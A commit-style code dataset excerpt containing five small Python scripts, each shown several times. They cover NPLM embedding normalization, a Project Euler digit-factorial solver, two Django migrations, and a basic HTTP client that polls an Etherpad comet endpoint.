    return nplm.NeuralLM.from_file(model_file)


def get_weights(path, length):
    d = [0]*length
    for line in open(path):
        last_context = int(line.split()[-2])
        d[last_context] += 1
    return d


if __name__ == "__main__":
    a = load_model(options.input_model)
    print 'before:'
    print a.input_embeddings[options.null_idx]
    weights = numpy.array(get_weights(options.training_ngrams, len(a.input_embeddings)))
    a.input_embeddings[options.null_idx] = numpy.average(numpy.array(a.input_embeddings), weights=weights, axis=0)
    print 'after:'
    print a.input_embeddings[options.null_idx]
    a.to_file(open(options.output_model,'w'))
|
<commit_before><commit_msg>Add null token normalization for models to be used with the chart decoder.<commit_after>
|
#!/usr/bin/env python2
import sys
import numpy
import optparse

#sys.path.append('/data/tools/nplm/python')

parser = optparse.OptionParser("%prog [options]")
parser.add_option("-p", "--nplm-python-path", type="string", dest="nplm_python_path")
parser.add_option("-i", "--input-model", type="string", dest="input_model")
parser.add_option("-o", "--output-model", type="string", dest="output_model")
parser.add_option("-n", "--null-token-index", type="int", dest="null_idx")
parser.add_option("-t", "--training-ngrams", type="string", dest="training_ngrams")
parser.set_defaults(
    nplm_python_path = '/mnt/gna0/rsennrich/tools/nplm/python',
    null_idx = 1
)
options,_ = parser.parse_args(sys.argv)

sys.path.append(options.nplm_python_path)
import nplm
from collections import defaultdict


def load_model(model_file):
    return nplm.NeuralLM.from_file(model_file)


def get_weights(path, length):
    d = [0]*length
    for line in open(path):
        last_context = int(line.split()[-2])
        d[last_context] += 1
    return d


if __name__ == "__main__":
    a = load_model(options.input_model)
    print 'before:'
    print a.input_embeddings[options.null_idx]
    weights = numpy.array(get_weights(options.training_ngrams, len(a.input_embeddings)))
    a.input_embeddings[options.null_idx] = numpy.average(numpy.array(a.input_embeddings), weights=weights, axis=0)
    print 'after:'
    print a.input_embeddings[options.null_idx]
    a.to_file(open(options.output_model,'w'))
|
Add null token normalization for models to be used with the chart decoder.
#!/usr/bin/env python2
import sys
import numpy
import optparse

#sys.path.append('/data/tools/nplm/python')

parser = optparse.OptionParser("%prog [options]")
parser.add_option("-p", "--nplm-python-path", type="string", dest="nplm_python_path")
parser.add_option("-i", "--input-model", type="string", dest="input_model")
parser.add_option("-o", "--output-model", type="string", dest="output_model")
parser.add_option("-n", "--null-token-index", type="int", dest="null_idx")
parser.add_option("-t", "--training-ngrams", type="string", dest="training_ngrams")
parser.set_defaults(
    nplm_python_path = '/mnt/gna0/rsennrich/tools/nplm/python',
    null_idx = 1
)
options,_ = parser.parse_args(sys.argv)

sys.path.append(options.nplm_python_path)
import nplm
from collections import defaultdict


def load_model(model_file):
    return nplm.NeuralLM.from_file(model_file)


def get_weights(path, length):
    d = [0]*length
    for line in open(path):
        last_context = int(line.split()[-2])
        d[last_context] += 1
    return d


if __name__ == "__main__":
    a = load_model(options.input_model)
    print 'before:'
    print a.input_embeddings[options.null_idx]
    weights = numpy.array(get_weights(options.training_ngrams, len(a.input_embeddings)))
    a.input_embeddings[options.null_idx] = numpy.average(numpy.array(a.input_embeddings), weights=weights, axis=0)
    print 'after:'
    print a.input_embeddings[options.null_idx]
    a.to_file(open(options.output_model,'w'))
|
<commit_before><commit_msg>Add null token normalization for models to be used with the chart decoder.<commit_after>
#!/usr/bin/env python2
import sys
import numpy
import optparse

#sys.path.append('/data/tools/nplm/python')

parser = optparse.OptionParser("%prog [options]")
parser.add_option("-p", "--nplm-python-path", type="string", dest="nplm_python_path")
parser.add_option("-i", "--input-model", type="string", dest="input_model")
parser.add_option("-o", "--output-model", type="string", dest="output_model")
parser.add_option("-n", "--null-token-index", type="int", dest="null_idx")
parser.add_option("-t", "--training-ngrams", type="string", dest="training_ngrams")
parser.set_defaults(
    nplm_python_path = '/mnt/gna0/rsennrich/tools/nplm/python',
    null_idx = 1
)
options,_ = parser.parse_args(sys.argv)

sys.path.append(options.nplm_python_path)
import nplm
from collections import defaultdict


def load_model(model_file):
    return nplm.NeuralLM.from_file(model_file)


def get_weights(path, length):
    d = [0]*length
    for line in open(path):
        last_context = int(line.split()[-2])
        d[last_context] += 1
    return d


if __name__ == "__main__":
    a = load_model(options.input_model)
    print 'before:'
    print a.input_embeddings[options.null_idx]
    weights = numpy.array(get_weights(options.training_ngrams, len(a.input_embeddings)))
    a.input_embeddings[options.null_idx] = numpy.average(numpy.array(a.input_embeddings), weights=weights, axis=0)
    print 'after:'
    print a.input_embeddings[options.null_idx]
    a.to_file(open(options.output_model,'w'))
|
|
983085ed78b157b5c1c2e525506a3221c7a3881a
|
problem_34.py
|
problem_34.py
|
from problem_20 import factorial
from time import time


def calculate_digit_factorials(start, end):
    known_factorials = {}
    digit_factorials = []
    for num in range(start, end):
        factorial_sum = 0
        for digit in str(num):
            if digit not in known_factorials:
                known_factorials[digit] = factorial(int(digit))
            factorial_sum += known_factorials[digit]
        if num == factorial_sum:
            digit_factorials.append(num)
    return digit_factorials


if __name__ == '__main__':
    t = time()
    digit_factorials = calculate_digit_factorials(10, 50000)
    print 'Factorials:', digit_factorials
    print 'Sum:', sum(digit_factorials)
    print 'Time:', time() - t
|
Add problem 34, digit factorials
|
Add problem 34, digit factorials
|
Python
|
mit
|
dimkarakostas/project-euler
|
Add problem 34, digit factorials
|
from problem_20 import factorial
from time import time


def calculate_digit_factorials(start, end):
    known_factorials = {}
    digit_factorials = []
    for num in range(start, end):
        factorial_sum = 0
        for digit in str(num):
            if digit not in known_factorials:
                known_factorials[digit] = factorial(int(digit))
            factorial_sum += known_factorials[digit]
        if num == factorial_sum:
            digit_factorials.append(num)
    return digit_factorials


if __name__ == '__main__':
    t = time()
    digit_factorials = calculate_digit_factorials(10, 50000)
    print 'Factorials:', digit_factorials
    print 'Sum:', sum(digit_factorials)
    print 'Time:', time() - t
|
<commit_before><commit_msg>Add problem 34, digit factorials<commit_after>
|
from problem_20 import factorial
from time import time


def calculate_digit_factorials(start, end):
    known_factorials = {}
    digit_factorials = []
    for num in range(start, end):
        factorial_sum = 0
        for digit in str(num):
            if digit not in known_factorials:
                known_factorials[digit] = factorial(int(digit))
            factorial_sum += known_factorials[digit]
        if num == factorial_sum:
            digit_factorials.append(num)
    return digit_factorials


if __name__ == '__main__':
    t = time()
    digit_factorials = calculate_digit_factorials(10, 50000)
    print 'Factorials:', digit_factorials
    print 'Sum:', sum(digit_factorials)
    print 'Time:', time() - t
|
Add problem 34, digit factorials
from problem_20 import factorial
from time import time


def calculate_digit_factorials(start, end):
    known_factorials = {}
    digit_factorials = []
    for num in range(start, end):
        factorial_sum = 0
        for digit in str(num):
            if digit not in known_factorials:
                known_factorials[digit] = factorial(int(digit))
            factorial_sum += known_factorials[digit]
        if num == factorial_sum:
            digit_factorials.append(num)
    return digit_factorials


if __name__ == '__main__':
    t = time()
    digit_factorials = calculate_digit_factorials(10, 50000)
    print 'Factorials:', digit_factorials
    print 'Sum:', sum(digit_factorials)
    print 'Time:', time() - t
|
<commit_before><commit_msg>Add problem 34, digit factorials<commit_after>
from problem_20 import factorial
from time import time


def calculate_digit_factorials(start, end):
    known_factorials = {}
    digit_factorials = []
    for num in range(start, end):
        factorial_sum = 0
        for digit in str(num):
            if digit not in known_factorials:
                known_factorials[digit] = factorial(int(digit))
            factorial_sum += known_factorials[digit]
        if num == factorial_sum:
            digit_factorials.append(num)
    return digit_factorials


if __name__ == '__main__':
    t = time()
    digit_factorials = calculate_digit_factorials(10, 50000)
    print 'Factorials:', digit_factorials
    print 'Sum:', sum(digit_factorials)
    print 'Time:', time() - t
|
|
3dbc4715cba02850b8062c9db4d954cc913b7492
|
blog/migrations/0008_remove_commenters_without_posts.py
|
blog/migrations/0008_remove_commenters_without_posts.py
|
from django.db import migrations


def remove_commenters_without_post(apps, schema_editor):
    Commenter = apps.get_model('blog', 'Commenter')
    Commenter.objects.filter(comments__isnull=True).delete()


class Migration(migrations.Migration):

    dependencies = [
        ('blog', '0007_protect_articles_from_user_deletion'),
    ]

    operations = [
        migrations.RunPython(
            remove_commenters_without_post,
            migrations.RunPython.noop,
            elidable=True,
        ),
    ]
|
Add a migration to remove garbage commenter objects
|
Add a migration to remove garbage commenter objects
|
Python
|
bsd-2-clause
|
w0rp/w0rpzone,w0rp/w0rpzone,w0rp/w0rpzone,w0rp/w0rpzone
|
Add a migration to remove garbage commenter objects
|
from django.db import migrations


def remove_commenters_without_post(apps, schema_editor):
    Commenter = apps.get_model('blog', 'Commenter')
    Commenter.objects.filter(comments__isnull=True).delete()


class Migration(migrations.Migration):

    dependencies = [
        ('blog', '0007_protect_articles_from_user_deletion'),
    ]

    operations = [
        migrations.RunPython(
            remove_commenters_without_post,
            migrations.RunPython.noop,
            elidable=True,
        ),
    ]
|
<commit_before><commit_msg>Add a migration to remove garbage commenter objects<commit_after>
|
from django.db import migrations


def remove_commenters_without_post(apps, schema_editor):
    Commenter = apps.get_model('blog', 'Commenter')
    Commenter.objects.filter(comments__isnull=True).delete()


class Migration(migrations.Migration):

    dependencies = [
        ('blog', '0007_protect_articles_from_user_deletion'),
    ]

    operations = [
        migrations.RunPython(
            remove_commenters_without_post,
            migrations.RunPython.noop,
            elidable=True,
        ),
    ]
|
Add a migration to remove garbage commenter objects
from django.db import migrations


def remove_commenters_without_post(apps, schema_editor):
    Commenter = apps.get_model('blog', 'Commenter')
    Commenter.objects.filter(comments__isnull=True).delete()


class Migration(migrations.Migration):

    dependencies = [
        ('blog', '0007_protect_articles_from_user_deletion'),
    ]

    operations = [
        migrations.RunPython(
            remove_commenters_without_post,
            migrations.RunPython.noop,
            elidable=True,
        ),
    ]
|
<commit_before><commit_msg>Add a migration to remove garbage commenter objects<commit_after>
from django.db import migrations


def remove_commenters_without_post(apps, schema_editor):
    Commenter = apps.get_model('blog', 'Commenter')
    Commenter.objects.filter(comments__isnull=True).delete()


class Migration(migrations.Migration):

    dependencies = [
        ('blog', '0007_protect_articles_from_user_deletion'),
    ]

    operations = [
        migrations.RunPython(
            remove_commenters_without_post,
            migrations.RunPython.noop,
            elidable=True,
        ),
    ]
|
|
24dd968202329c5f524645e764b9ad0c84324cdb
|
webapp/apps/taxbrain/migrations/0014_auto_20151124_2029.py
|
webapp/apps/taxbrain/migrations/0014_auto_20151124_2029.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals

from django.db import models, migrations
import webapp.apps.taxbrain.models


class Migration(migrations.Migration):

    dependencies = [
        ('taxbrain', '0013_auto_20151120_2141'),
    ]

    operations = [
        migrations.AddField(
            model_name='taxsaveinputs',
            name='ID_BenefitSurtax_Switch_6',
            field=models.CharField(default=b'True', max_length=50, null=True, blank=True),
        ),
        migrations.AddField(
            model_name='taxsaveinputs',
            name='ID_RealEstate_HC',
            field=webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True),
        ),
    ]
|
Add migration for new field in TaxSaveInputs
|
Add migration for new field in TaxSaveInputs
|
Python
|
mit
|
zrisher/webapp-public,zrisher/webapp-public,OpenSourcePolicyCenter/webapp-public,OpenSourcePolicyCenter/webapp-public,zrisher/webapp-public,OpenSourcePolicyCenter/PolicyBrain,OpenSourcePolicyCenter/PolicyBrain,OpenSourcePolicyCenter/webapp-public,OpenSourcePolicyCenter/PolicyBrain,zrisher/webapp-public,OpenSourcePolicyCenter/webapp-public,OpenSourcePolicyCenter/PolicyBrain
|
Add migration for new field in TaxSaveInputs
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals

from django.db import models, migrations
import webapp.apps.taxbrain.models


class Migration(migrations.Migration):

    dependencies = [
        ('taxbrain', '0013_auto_20151120_2141'),
    ]

    operations = [
        migrations.AddField(
            model_name='taxsaveinputs',
            name='ID_BenefitSurtax_Switch_6',
            field=models.CharField(default=b'True', max_length=50, null=True, blank=True),
        ),
        migrations.AddField(
            model_name='taxsaveinputs',
            name='ID_RealEstate_HC',
            field=webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True),
        ),
    ]
|
<commit_before><commit_msg>Add migration for new field in TaxSaveInputs<commit_after>
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals

from django.db import models, migrations
import webapp.apps.taxbrain.models


class Migration(migrations.Migration):

    dependencies = [
        ('taxbrain', '0013_auto_20151120_2141'),
    ]

    operations = [
        migrations.AddField(
            model_name='taxsaveinputs',
            name='ID_BenefitSurtax_Switch_6',
            field=models.CharField(default=b'True', max_length=50, null=True, blank=True),
        ),
        migrations.AddField(
            model_name='taxsaveinputs',
            name='ID_RealEstate_HC',
            field=webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True),
        ),
    ]
|
Add migration for new field in TaxSaveInputs
# -*- coding: utf-8 -*-
from __future__ import unicode_literals

from django.db import models, migrations
import webapp.apps.taxbrain.models


class Migration(migrations.Migration):

    dependencies = [
        ('taxbrain', '0013_auto_20151120_2141'),
    ]

    operations = [
        migrations.AddField(
            model_name='taxsaveinputs',
            name='ID_BenefitSurtax_Switch_6',
            field=models.CharField(default=b'True', max_length=50, null=True, blank=True),
        ),
        migrations.AddField(
            model_name='taxsaveinputs',
            name='ID_RealEstate_HC',
            field=webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True),
        ),
    ]
|
<commit_before><commit_msg>Add migration for new field in TaxSaveInputs<commit_after>
# -*- coding: utf-8 -*-
from __future__ import unicode_literals

from django.db import models, migrations
import webapp.apps.taxbrain.models


class Migration(migrations.Migration):

    dependencies = [
        ('taxbrain', '0013_auto_20151120_2141'),
    ]

    operations = [
        migrations.AddField(
            model_name='taxsaveinputs',
            name='ID_BenefitSurtax_Switch_6',
            field=models.CharField(default=b'True', max_length=50, null=True, blank=True),
        ),
        migrations.AddField(
            model_name='taxsaveinputs',
            name='ID_RealEstate_HC',
            field=webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True),
        ),
    ]
|
|
8c1785e9df05c4c37a66efa12919e59eefb08672
|
client/comet/server.py
|
client/comet/server.py
|
#!/usr/bin/python
import httplib

con = httplib.HTTPConnection("kevinwells.homeip.net", 8082)
con.connect()

params = {
    "Host": "kevinwells.homeip.net:8082",
    "User-Agent": "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.12) Gecko/20101027 Ubuntu/10.04 (lucid) Firefox/3.6.12",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language": "en-us,en;q=0.5",
    "Accept-Encoding": "gzip,deflate",
    "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
    "Keep-Alive": "115",
    "Connection": "keep-alive",
    "Referer": "http://kevinwells.homeip.net:8083/comet/test.html",
    "Origin": "http://kevinwells.homeip.net:8083"
}

url = "/comet/channel?v=2&r=300213452569&id=302230364768&channel=shortpolling&new=yes&create=yes&seq=0"
con.request("GET", url, headers=params)

response = con.getresponse()
print response
print dir(response)
print response.getheaders()
print response.msg
print response.read()

con.close()
|
Add simple client that gets a url from Etherpad.
|
Add simple client that gets a url from Etherpad.
Signed-off-by: Kevin Wells <ddbad7bcca2214e131304d62ab73c459da56f690@rose-hulman.edu>
|
Python
|
apache-2.0
|
PolicyStat/PolicyPad,PolicyStat/PolicyPad,PolicyStat/PolicyPad
|
Add simple client that gets a url from Etherpad.
Signed-off-by: Kevin Wells <ddbad7bcca2214e131304d62ab73c459da56f690@rose-hulman.edu>
|
#!/usr/bin/python
import httplib

con = httplib.HTTPConnection("kevinwells.homeip.net", 8082)
con.connect()

params = {
    "Host": "kevinwells.homeip.net:8082",
    "User-Agent": "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.12) Gecko/20101027 Ubuntu/10.04 (lucid) Firefox/3.6.12",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language": "en-us,en;q=0.5",
    "Accept-Encoding": "gzip,deflate",
    "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
    "Keep-Alive": "115",
    "Connection": "keep-alive",
    "Referer": "http://kevinwells.homeip.net:8083/comet/test.html",
    "Origin": "http://kevinwells.homeip.net:8083"
}

url = "/comet/channel?v=2&r=300213452569&id=302230364768&channel=shortpolling&new=yes&create=yes&seq=0"
con.request("GET", url, headers=params)

response = con.getresponse()
print response
print dir(response)
print response.getheaders()
print response.msg
print response.read()

con.close()
|
<commit_before><commit_msg>Add simple client that gets a url from Etherpad.
Signed-off-by: Kevin Wells <ddbad7bcca2214e131304d62ab73c459da56f690@rose-hulman.edu><commit_after>
|
#!/usr/bin/python
import httplib

con = httplib.HTTPConnection("kevinwells.homeip.net", 8082)
con.connect()

params = {
    "Host": "kevinwells.homeip.net:8082",
    "User-Agent": "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.12) Gecko/20101027 Ubuntu/10.04 (lucid) Firefox/3.6.12",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language": "en-us,en;q=0.5",
    "Accept-Encoding": "gzip,deflate",
    "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
    "Keep-Alive": "115",
    "Connection": "keep-alive",
    "Referer": "http://kevinwells.homeip.net:8083/comet/test.html",
    "Origin": "http://kevinwells.homeip.net:8083"
}

url = "/comet/channel?v=2&r=300213452569&id=302230364768&channel=shortpolling&new=yes&create=yes&seq=0"
con.request("GET", url, headers=params)

response = con.getresponse()
print response
print dir(response)
print response.getheaders()
print response.msg
print response.read()

con.close()
|
Add simple client that gets a url from Etherpad.
Signed-off-by: Kevin Wells <ddbad7bcca2214e131304d62ab73c459da56f690@rose-hulman.edu>
#!/usr/bin/python
import httplib

con = httplib.HTTPConnection("kevinwells.homeip.net", 8082)
con.connect()

params = {
    "Host": "kevinwells.homeip.net:8082",
    "User-Agent": "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.12) Gecko/20101027 Ubuntu/10.04 (lucid) Firefox/3.6.12",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language": "en-us,en;q=0.5",
    "Accept-Encoding": "gzip,deflate",
    "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
    "Keep-Alive": "115",
    "Connection": "keep-alive",
    "Referer": "http://kevinwells.homeip.net:8083/comet/test.html",
    "Origin": "http://kevinwells.homeip.net:8083"
}

url = "/comet/channel?v=2&r=300213452569&id=302230364768&channel=shortpolling&new=yes&create=yes&seq=0"
con.request("GET", url, headers=params)

response = con.getresponse()
print response
print dir(response)
print response.getheaders()
print response.msg
print response.read()

con.close()
|
<commit_before><commit_msg>Add simple client that gets a url from Etherpad.
Signed-off-by: Kevin Wells <ddbad7bcca2214e131304d62ab73c459da56f690@rose-hulman.edu><commit_after>
#!/usr/bin/python
import httplib

con = httplib.HTTPConnection("kevinwells.homeip.net", 8082)
con.connect()

params = {
    "Host": "kevinwells.homeip.net:8082",
    "User-Agent": "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.12) Gecko/20101027 Ubuntu/10.04 (lucid) Firefox/3.6.12",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language": "en-us,en;q=0.5",
    "Accept-Encoding": "gzip,deflate",
    "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
    "Keep-Alive": "115",
    "Connection": "keep-alive",
    "Referer": "http://kevinwells.homeip.net:8083/comet/test.html",
    "Origin": "http://kevinwells.homeip.net:8083"
}

url = "/comet/channel?v=2&r=300213452569&id=302230364768&channel=shortpolling&new=yes&create=yes&seq=0"
con.request("GET", url, headers=params)

response = con.getresponse()
print response
print dir(response)
print response.getheaders()
print response.msg
print response.read()

con.close()
|